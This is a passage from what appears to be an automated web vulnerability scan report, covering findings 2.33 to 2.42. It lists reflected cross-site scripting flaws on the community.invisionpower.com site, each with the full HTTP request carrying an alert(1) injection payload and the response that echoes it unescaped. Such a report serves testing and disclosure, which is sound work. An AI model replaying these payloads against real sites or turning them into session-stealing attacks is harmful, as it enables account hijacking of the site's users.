Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:13:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=82d2df6b70fbd655dc608f59349d762d; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:13:28 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:13:32 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwMbC0rgVcMFxcQwak; expires=Thu, 02-Feb-2012 23:13:32 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment1937a"-alert(1)-"b678fb81f8";
       ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Custom Customer Fields";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.33. http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 96d8c'><script>alert(1)</script>195a814bc00 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:13:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=f29e15c7c54cedf9b42b0ee026630452; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:13:05 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:13:07 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MrUwMLfOtDI0sjQzs7AwtjC1rgVcMFxcUgan; expires=Thu, 02-Feb-2012 23:13:07 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 89350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/1174/entry-5807-ipnexus-12-dev-update-custom-customer-fields/page__show__newcomment96d8c'><script>alert(1)</script>195a814bc00?_rcid=11592#fastreply' title="Reply directly to this post" id='reply_comment_11592' class='reply_comment'>
...[SNIP]...

2.34. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aed0d"-alert(1)-"5c4d62dddb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=483934fd9ed109c9f59012f046077e03; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:45 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:50 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwNjO1rgVcMFxc4Aau; expires=Thu, 02-Feb-2012 23:12:50 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 69387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?aed0d"-alert(1)-"5c4d62dddb8=1";
       ipb.sharelinks.title = "Viril 1.0.1 Release With Bug Fixes &amp; New Features";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.35. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7345'><script>alert(1)</script>8f568237069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:12:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=574c304259c12fb245c396fa11aa3e0c; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:12:27 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:12:30 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwNjG3rgVcMFxc3gau; expires=Thu, 02-Feb-2012 23:12:30 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 69622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/?a7345'><script>alert(1)</script>8f568237069=1&amp;_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'>
...[SNIP]...

2.36. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edee4"-alert(1)-"26b08451a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:14:42 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=1e8a6cf95c755b71a85b23d27acc781f; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:14:44 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:14:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwsTC1rgVcMFxc7Qax; expires=Thu, 02-Feb-2012 23:14:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 69805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcommentedee4"-alert(1)-"26b08451a";
       ipb.sharelinks.title = "Viril 1.0.1 Release With Bug Fixes &amp; New Features";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.37. http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 91bc6'><script>alert(1)</script>783674a36c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:14:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=828e007355de3a267f8189ac08ed6f71; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:14:22 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:14:24 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjW3sLTOtDI0sjQzs7AwMTO2rgVcMFxc3wat; expires=Thu, 02-Feb-2012 23:14:24 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 70185

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<a href='http://community.invisionpower.com/blog/2568/entry-5789-viril-101-release-with-bug-fixes-new-features/page__show__newcomment91bc6'><script>alert(1)</script>783674a36c7?_rcid=11544#fastreply' title="Reply directly to this post" id='reply_comment_11544' class='reply_comment'>
...[SNIP]...

2.38. http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb36"-alert(1)-"326757020f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:08:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8a369b3a7a3462aa407cc49d4fe33267; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:08:08 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:08:10 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:08:12 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrXOtDI0sjQzs7AwsDSwrgVcMFxcNwag; expires=Thu, 02-Feb-2012 23:08:12 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1";
       ipb.sharelinks.title = "(SOS31) Improve Next-Previous Issue links in IP.Tracker v1.0.0";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3936-ipdownloads-file-version-in-support-topic-title/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228af"-alert(1)-"3451a0f7ce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ac46a5f91ebbe68b20c4bad9616a198e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:54 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:55 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:56 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrPOtDI0sjQzs7AwMDS1rgVcMFxcNgae; expires=Thu, 02-Feb-2012 23:06:56 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 44635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1";
       ipb.sharelinks.title = "IP.Downloads file version in support topic title";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3937-peace/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54fb5"-alert(1)-"94f3b1605b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:07:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=87bfd7d61ac44499caa74b4611ca9ede; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:07:17 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:07:18 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:07:20 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrfOtDI0sjQzs7AwMLawrgVcMFxcVwak; expires=Thu, 02-Feb-2012 23:07:20 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1";
       ipb.sharelinks.title = "Peace";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ec7"-alert(1)-"d8405c2df0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=21b812349bc4e0a64fc1a88e53d7af77; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:43 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:45 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0trDOtDI0sjQzs7AwMDC1rgVcMFxcUgaf; expires=Thu, 02-Feb-2012 23:06:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 45699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1";
       ipb.sharelinks.title = "Turkish / T.rk.e Language Pack for (M31) Videos System 2.0.3 (public side)";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

2.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3939-vietnamese-3xx-lang/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 452cc"-alert(1)-"471a521f57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:07:02 GMT
